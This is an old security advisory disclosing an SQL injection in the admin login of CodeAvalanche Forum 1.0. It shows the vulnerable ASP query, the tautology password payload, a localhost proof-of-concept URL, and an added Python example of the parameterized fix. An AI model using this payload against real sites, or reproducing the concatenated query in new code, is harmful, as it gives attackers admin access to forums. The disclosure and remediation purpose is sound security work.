
CA Forum Remote SQL Injection






------------------------------------------------------------------
               - CAForum 1.0 Remote SQL Injection -
-= http://colander.altervista.org/advisory/CAForum.txt =-
------------------------------------------------------------------

	    -= CodeAvalanche Forum Version 1.0 =-



Omnipresent
June 01, 2006


Vulnerability(s):
----------------
SQL Injection
=0D
=0D
=0D
Product:
--------
CodeAvalanche Forum Version 1.0

Vendor:
--------
http://www.truecontent.info/codeavalanche/asp-forum-script.php


Description of product:
-----------------------

CodeAvalanche FreeForum is an ASP forum application that allows free posting; your
visitors do not need to register. The administrator can add an unlimited number of forum categories.
=0D
=0D
Vulnerability / Exploit:
------------------------

The file default.asp in the Admin directory is vulnerable to a Remote SQL Injection attack.
A malicious user can gain Admin rights by supplying a crafted value in the Password variable.

Let's check the source code:
=0D
<% Response.Buffer = True

userLogged = false
If Request("Password") <> "" Then
    'response.Write(Request("Password"))
    'response.flush

    dim rsUser, selectSQL
    ' The request value is concatenated straight into the SQL text;
    ' this is the injection point described above.
    selectSQL = "SELECT * FROM PARAMS where PASSWORD='" & Request("Password") & "'"


[...]



[End default.asp]
=0D
As you can see, the variable Password is not properly sanitized before being used, so an attacker can put this string in the
password field:


1' OR '1' = '1

So, the query will be:

selectSQL = "SELECT * FROM PARAMS where PASSWORD='1' OR '1' = '1'"


And you can gain access to the application with admin rights.
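The following is an added example, not code from the advisory or from CodeAvalanche. It models the PARAMS lookup above against an in-memory SQLite table (the real schema is not given on the page, so a single PASSWORD column and a constructed admin password are assumed) and shows, side by side, the concatenated query from default.asp and the parameterized form that closes the hole: the string from the advisory matches a row in the first and no row in the second.

```python
import sqlite3

# Constructed values standing in for the forum's PARAMS table; the advisory
# only shows that the table has a PASSWORD column.
ADMIN_PASSWORD = "s3cret-admin"      # constructed, not from the advisory
INJECTION = "1' OR '1' = '1"         # the string quoted in the advisory


def make_db():
    """Create an in-memory stand-in for PARAMS with one admin record."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE PARAMS (ID INTEGER PRIMARY KEY, PASSWORD TEXT)")
    conn.execute("INSERT INTO PARAMS (PASSWORD) VALUES (?)", (ADMIN_PASSWORD,))
    conn.commit()
    return conn


def login_concatenated(conn, password):
    """Mirror of default.asp: the request value becomes part of the SQL text."""
    select_sql = "SELECT * FROM PARAMS where PASSWORD='" + password + "'"
    return len(conn.execute(select_sql).fetchall()) > 0


def login_parameterized(conn, password):
    """Hardened form: the value is bound as a parameter and can never alter
    the statement's structure, so the quote in the payload is just data."""
    rows = conn.execute(
        "SELECT * FROM PARAMS WHERE PASSWORD = ?", (password,)
    ).fetchall()
    return len(rows) > 0


def demo():
    """Run both variants with the real password and with the advisory's string."""
    conn = make_db()
    return {
        "concat_real": login_concatenated(conn, ADMIN_PASSWORD),
        "concat_injected": login_concatenated(conn, INJECTION),
        "param_real": login_parameterized(conn, ADMIN_PASSWORD),
        "param_injected": login_parameterized(conn, INJECTION),
    }


if __name__ == "__main__":
    for name, granted in demo().items():
        print(f"{name}: {'login granted' if granted else 'login denied'}")
```

The tautology works because the concatenated text becomes `WHERE PASSWORD='1' OR '1' = '1'`, and `'1' = '1'` is true for every row; in the parameterized version the whole string is compared against the column as an opaque value, so only the genuine password is accepted. The same fix applies to the original ASP through ADODB.Command parameters rather than string concatenation.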
=0D
=0D
PoC / Proof of Concept of SQL Injection:
----------------------------------------

This is a simple Proof Of Concept used on my local machine:


http://127.0.0.1/[Application_Path]/[CAForum]/admin/default.asp?password=1'%20OR%20'1'%20=%20'1
=0D
=0D
Vendor Status
-------------

Not informed!

Credits:
--------
omnipresent
omnipresent@email.it

